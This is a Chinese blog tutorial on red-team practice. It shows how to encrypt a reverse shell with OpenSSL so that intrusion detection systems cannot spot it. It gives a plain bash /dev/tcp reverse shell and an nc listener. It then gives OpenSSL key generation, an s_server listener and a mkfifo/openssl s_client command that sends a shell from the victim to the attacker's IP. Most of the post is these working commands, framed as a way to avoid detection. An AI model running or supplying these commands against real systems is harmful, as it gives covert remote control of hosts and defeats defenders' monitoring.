流量加密-Kali使用Openssl反彈shell
阿新 • • 發佈:2021-08-08
Kali使用Openssl反彈shell
前言
之前在護網的時候,如果流量中有明文的敏感資訊,譬如攻擊特徵,是很容易被IDS檢測出來的,此時紅隊的攻擊行為就會暴露。這是非常危險的一件事。今天我們通過本篇部落格來完成使用Openssl反彈shelll來加密流量。
正文
普通反彈shell
首先我們來看不使用流量加密反彈shell,通過wireshark可以明顯撲捉到攻擊特徵。
首先kali開啟NC監聽:
nc -lvvp 8080
然後在受害主機上反彈shell
bash -c 'exec bash -i &>/dev/tcp/192.168.37.134/8080 <&1'
在wireshark進行抓包,可以看到獲取到的敏感資訊是未加密的,這是會被IDC捕捉到的。
Openssl反彈shell
Openssl的百度百科簡介:
在計算機網路上,OpenSSL是一個開放原始碼的軟體庫包,應用程式可以使用這個包來進行安全通訊,避免竊聽,同時確認另一端連線者的身份。這個包廣泛被應用在網際網路的網頁伺服器上。
Openssl的特點是使用安全通道、並且開源。Openssl實現的SSL協議是存粹的SSL協議,沒有和其他協議結合在一起。
接下來我們使用OpenSSL對流量進行加密
首先Kali攻擊機上需要生成金鑰:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -node
然後再kali攻擊機上監聽指定埠,譬如8082:
openssl s_server -quiet -key key.pem -cert cert.pem -port 8082
接著在受害主機上以openssl的形式反彈shell,注意指定IP和埠
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.37.134:8082 > /tmp/s;
可以看到kali上順利回彈了shell,
並且檢視敏感檔案時,流量是加密的